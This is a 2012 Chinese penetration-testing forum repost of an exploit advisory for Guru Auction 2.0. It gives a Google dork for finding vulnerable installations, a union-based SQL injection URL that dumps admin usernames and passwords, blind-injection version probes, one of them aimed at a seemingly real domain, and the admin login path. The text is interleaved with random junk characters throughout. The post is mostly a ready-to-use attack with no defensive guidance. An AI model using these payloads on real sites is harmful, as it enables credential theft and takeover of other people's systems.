中国网络渗透测试联盟

标题: Guru Auction 2.0多重sql注射 [打印本页]
作者: admin    时间: 2012-12-31 09:24
标题: Guru Auction 2.0多重sql注射
Guru Auction 2.0 Multiple SQL Injection Vulnerabilities5 z8 I1 c8 J( r  p1 ?& n3 U# j# T5 {
# t; D( [; {- @6 e  J9 b  L
作者     : v3n0m
. B; C4 \" g7 T! \+ @* `/ x- B应用 : Guru Auction 2.0
, R; T: s# y: i8 P9 n, VPrice       : $49/ k' e7 D  |$ [. P, ]- i! X
Vendor      : http://www.guruscript.com/2 r# P9 r) [* \2 p1 y) E* N
Google Dork : inurl:subcat.php?cate_id=
; {& T. S5 D- A9 ^8 |1 ]& N6 `; P: S
, O( h* j- g! |. C+ \3 I1 wSQLi p0c:
2 J5 v) ~& _7 ^8 r9 w  T~~~~~~~~~~+ q/ c7 n4 e8 f  n7 V: i! f3 l
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--. [' `2 K* E2 B( J

  i! f- h3 E& @! k - }* V# ]2 Q9 [. }  I5 a
盲注 p0c:$ G- f; [& l4 M) }& g, ?
~~~~~~~~~~
. x: P  ?  J1 d6 ?8 _" C6 `http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true1 T7 }/ B+ W- C2 E. K( b1 @
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
: Z3 R: d7 e: |. T8 P0 F% m9 l; b5 L . f4 m: h; J& M) N, a2 U0 n
管理登录入口:# \# s3 h0 \- j/ \- t% b
~~~~~~~~~~
% K  p0 G( A+ }; vhttp://domain.tld/[path]/admin/
& I- k: S0 A  g( Y$ Y8 R6 e' N' ^



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2